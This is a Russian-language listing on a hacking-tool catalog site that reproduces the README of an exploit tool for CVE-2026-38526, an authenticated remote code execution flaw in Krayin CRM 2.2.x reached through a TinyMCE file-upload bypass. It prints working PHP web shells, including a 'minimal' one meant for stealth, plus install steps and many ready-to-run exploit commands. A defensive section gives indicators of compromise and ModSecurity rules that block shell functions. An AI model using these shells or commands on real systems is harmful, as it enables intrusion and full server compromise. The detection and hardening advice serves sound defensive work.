Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 эксплойт для Krayin CRM v2.2.x - Аутентифицированное RCE через обход загрузки файлов TinyMCE. Включает интерактивную оболочку, полезные нагрузки различных типов, автоматическую генерацию оболочки и верификацию. Автор: Sudeepa Wanigarathna. Только для авторизованного тестирования. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingГенерация Шеллкода
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

Репозиторий
371 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-38526 эксплойт для Krayin CRM v2.2.x - Аутентифицированное RCE через обход загрузки файлов TinyMCE. Включает интерактивную оболочку, полезные нагрузки различных типов, автоматическую генерацию оболочки и верификацию. Автор: Sudeepa Wanigarathna. Только для авторизованного тестирования.

Поделиться

🔓 Krayin CRM v2.2.x — Эксплуатация аутентифицированного удаленного выполнения кода

License: MIT CVE-2026-38526

⚠️ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ — несанкционированное использование незаконно и неэтично.

📋 Обзор

Этот эксплойт демонстрирует критическую уязвимость аутентифицированного удаленного выполнения кода (RCE), обнаруженную в Krayin CRM версии 2.2.x. Уязвимость существует в функционале загрузки файлов TinyMCE, который позволяет аутентифицированным администраторам загружать и выполнять произвольный PHP-код на сервере.

СвойствоЗначение
CVE IDCVE-2026-38526
Затронутое ПОKrayin CRM v2.2.x
Тип уязвимостиАутентифицированное удаленное выполнение кода (RCE)
Требуется аутентификацияДа (доступ уровня администратора)
ВоздействиеПолная компрометация системы
Оценка CVSS8.8 (Высокий)

🚨 Детали уязвимости

Уязвимость возникает из-за недостаточной проверки типа файла в конечной точке загрузки TinyMCE (/admin/tinymce/upload). Аутентифицированный администратор может:

  • Загрузить PHP-файл, замаскированный под MIME-тип изображения.
  • Файл сохраняется в доступном через веб местоположении.
  • Затем злоумышленник может выполнить произвольный PHP-код на сервере.

Затронутые версии

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Все версии 2.2.x до выпуска патча

✨ Возможности

  • Несколько типов оболочек: Базовая, Расширенная, Минимальная, Файловый менеджер и Пользовательская.
  • Интерактивная оболочка: Полноценный интерфейс, подобный терминалу, с историей команд.
  • Загрузка файлов: Загрузка дополнительных файлов через оболочку.
  • Извлечение CSRF-токена: Автоматическая обработка защиты CSRF.
  • Поддержка прокси: Маршрутизация трафика через HTTP/HTTPS прокси.
  • Гибкие форматы вывода: Текст, JSON или Тихий режим.
  • Логика повторных попыток: Автоматические повторные попытки при сбоях соединения.
  • Пользовательские заголовки: Поддержка произвольных HTTP-заголовков.
  • Подробный режим: Детальный отладочный вывод.
  • Поддержка SSL: Опциональная проверка SSL-сертификатов.

📦 Установка

Требования

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Быстрая установка

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Файл требований (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Использование

Основной синтаксис команды

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [ОПЦИИ]

Обязательные параметры

ПараметрОписание
-t, --targetURL цели (например, http://192.168.1.100)
-u, --usernameИмя администратора или email
-p, --passwordПароль администратора

Примеры распространённого использования

root@kitploit:~
# Базовая эксплуатация со сгенерированной оболочкой
python3 exploit.py -t http://target.com -u [email protected] -p password

# Загрузка пользовательского PHP-файла оболочки
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Генерация расширенной оболочки с интерактивным режимом
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Генерация файла оболочки без эксплуатации
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Использование с прокси для тестирования/отладки
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Вывод JSON для автоматизации
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Подробный режим с пользовательским таймаутом
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# Пользовательский User-Agent и заголовки
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Типы оболочек

  1. Базовая оболочка (basic) Простое выполнение команд с помощью функции system().

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Расширенная оболочка (advanced) Функционально богатая оболочка с:

    • Несколькими методами выполнения команд
    • Красивым веб-интерфейсом, напоминающим терминал
    • Поддержкой истории команд
    • Отображением текущего пользователя и имени хоста
  3. Минимальная оболочка (minimal) Минимальный след для скрытности.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. Файловый менеджер (file_manager) Полноценный интерфейс управления файлами:

    • Загрузка файлов
    • Удаление файлов
    • Создание каталогов
    • Навигация
    • Просмотр прав доступа к файлам
  5. Пользовательская оболочка (custom) Используйте собственный PHP-файл оболочки с параметром -f.

📝 Форматы вывода

Текстовый формат (по умолчанию)

Человекочитаемый цветной вывод, подходящий для интерактивного использования.

Формат JSON (-o json)

Машиночитаемый формат для автоматизации и интеграции.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Тихий формат (-q, --quiet)

Нет вывода, кроме ошибок. Полезен для пакетной обработки.

⚙️ Дополнительные опции

ОпцияОписаниеПо умолчанию
--timeoutТаймаут запроса в секундах30
--retryКоличество повторных попыток3
--retry-delayЗадержка между повторными попытками в секундах2
--user-agentПользовательская строка User-AgentБраузерный UA по умолчанию
--headerПользовательские HTTP-заголовки (Ключ: Значение)Нет
--verify-sslПроверять SSL-сертификатыFalse
--proxyURL HTTP/HTTPS проксиНет
-v, --verboseВключить отладочный выводFalse
-q, --quietПодавить весь выводFalse

Пример пользовательских заголовков

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Обнаружение и предотвращение

Признаки компрометации (IoC)

  • Файлы для мониторинга:

    • Необычные PHP-файлы в public/storage/upload/
    • Файлы с двойными расширениями (например, image.php.jpg)
    • Новые файлы с подозрительными именами
  • Логи для проверки:

    • POST-запросы к /admin/tinymce/upload
    • Необычное время входа администраторов
    • Неудачные попытки аутентификации
  • Системные индикаторы:

    • Неожиданные запущенные процессы
    • Новые задачи cron
    • Изменённые системные файлы

Меры предотвращения

  • Немедленные действия:

    root@kitploit:~
    # Обновление до пропатченной версии
    composer update krayin/crm
    
    # Временное отключение доступа администратора
    # Удаление ненужных учётных записей администратора
    # Смена всех паролей администраторов
    
  • Усиление защиты загрузки файлов:

    root@kitploit:~
    // Валидация типа файла по содержимому, а не только по расширению
    // Реализация политики безопасности содержимого (CSP)
    // Использование веб-брандмауэра (WAF)
    // Включение сканирования загружаемых файлов
    
  • Контроль доступа:

    root@kitploit:~
    # Ограничение IP-адресов администраторов в .htaccess
    # Внедрение MFA для учётных записей администраторов
    # Регулярный аудит администраторов
    # Политика таймаута сессии
    
  • Правила WAF (ModSecurity):

    root@kitploit:~
    # Блокировка подозрительных загрузок файлов
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Блокировка веб-оболочек
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ Ответственное раскрытие

Эта уязвимость была обнаружена в ходе ответственного исследования безопасности. Процесс раскрытия включал следующие шаги:

  • Обнаружение: Уязвимость выявлена во время оценки безопасности.
  • Подтверждение: Подтверждена уязвимость в Krayin CRM 2.2.x.
  • Отчёт: Приватное уведомление разработчиков Krayin CRM.
  • Координация: Работа с командой над разработкой исправления.
  • Патч: Ожидание официального выпуска патча.
  • Раскрытие: Публичное раскрытие после доступности патча.

Хронология

  • Обнаружение: TBD
  • Сообщено: TBD
  • Выпуск патча: TBD
  • Публичное раскрытие: TBD

📜 Отказ от ответственности

root@kitploit:~
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», И ЛЮБЫЕ ЯВНЫЕ
ИЛИ ПОДРАЗУМЕВАЕМЫЕ ГАРАНТИИ, ВКЛЮЧАЯ, НО НЕ ОГРАНИЧИВАЯСЬ, ПОДРАЗУМЕВАЕМЫМИ
ГАРАНТИЯМИ ТОВАРНОЙ ПРИГОДНОСТИ И ПРИГОДНОСТИ ДЛЯ ОПРЕДЕЛЁННОЙ ЦЕЛИ,
ОТКЛОНЯЮТСЯ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ АВТОР НЕ НЕСЁТ ОТВЕТСТВЕННОСТИ
ЗА ЛЮБОЙ ПРЯМОЙ, КОСВЕННЫЙ, СЛУЧАЙНЫЙ, ОСОБЫЙ, ПОКАЗАТЕЛЬНЫЙ ИЛИ
КОСВЕННЫЙ УЩЕРБ, ВОЗНИКШИЙ В РЕЗУЛЬТАТЕ ИСПОЛЬЗОВАНИЯ ЭТОГО ПРОГРАММНОГО
ОБЕСПЕЧЕНИЯ.

ИСПОЛЬЗОВАНИЕ ЭТОГО ИНСТРУМЕНТА ДЛЯ ЛЮБЫХ ЦЕЛЕЙ, КРОМЕ АВТОРИЗОВАННОГО
ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ, НЕЗАКОННО И НЕЭТИЧНО. АВТОР НЕ НЕСЁТ
ОТВЕТСТВЕННОСТИ ЗА НЕСАНКЦИОНИРОВАННОЕ ИСПОЛЬЗОВАНИЕ ИЛИ ЛЮБОЙ
УЩЕРБ, ПРИЧИНЁННЫЙ ЭТИМ ИНСТРУМЕНТОМ.

🔧 Устранение неполадок

Частые проблемы

  • Проблема: Сбой аутентификации

    • Решение: Проверьте учётные данные, убедитесь, что путь входа администратора — /admin/login
    • Проверьте: Что извлечение CSRF-токена работает корректно
  • Проблема: Не удаётся загрузить файл

    • Решение: Проверьте права на файлы, убедитесь, что конечная точка загрузки существует
    • Проверьте: Что цель использует редактор TinyMCE
  • Проблема: Оболочка не выполняет команды

    • Решение: Проверьте, что PHP-функции не отключены в php.ini
    • Проверьте: Простой командой, например echo test
  • Проблема: Ошибки SSL-сертификата

    • Решение: Используйте флаг --verify-ssl или отключите проверку
    • Примечание: Самоподписанные сертификаты вызовут ошибки без правильной проверки

Режим отладки

root@kitploit:~
# Включить подробное логирование
python3 exploit.py -t http://target.com -u admin -p pass -v

# С прокси (Burp Suite и т.д.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 Вклад

Приветствуются вклады! Пожалуйста, убедитесь:

  • Весь код должным образом протестирован.
  • Документация обновлена.
  • Соблюдаются этические нормы.
  • Исследование уязвимостей проводится ответственно.

📚 Ссылки

  • Официальный сайт Krayin CRM
  • CVE-2026-38526
  • OWASP Remote Code Execution
  • Лучшие практики безопасности PHP

⭐ Поддержка

Если вы считаете этот инструмент полезным для исследований безопасности, пожалуйста, рассмотрите:

  • ⭐ Поставить звезду репозиторию
  • 🔔 Подписаться на обновления
  • 📢 Поделиться с другими исследователями безопасности

Создано с ❤️ для исследований безопасности

Помните: Большая сила влечёт за собой большую ответственность. Используйте эти знания с умом!

📊 Краткая справочная карточка команд

root@kitploit:~
# Краткая справка
python3 exploit.py -t URL -u USER -p PASS [ОПЦИИ]

# Опции:
#   -f FILE           Загрузить пользовательскую оболочку
#   --shell-type TYPE Basic|Advanced|Minimal|File_Manager|Custom
#   -i                Интерактивный режим
#   --proxy URL       HTTP-прокси
#   -v                Подробный вывод
#   -o json           Вывод в JSON
#   --generate-only   Создать оболочку без эксплуатации
#   --timeout SEC     Таймаут запроса
#   --retry N         Число повторных попыток
#   --user-agent UA   Пользовательский User-Agent
#   --header "K: V"   Пользовательские заголовки
#   --verify-ssl      Проверять SSL-сертификаты
#   -q, --quiet       Подавить вывод

🔒 Помните: Всегда получайте письменное разрешение перед тестированием любой системы!

Скачать инструмент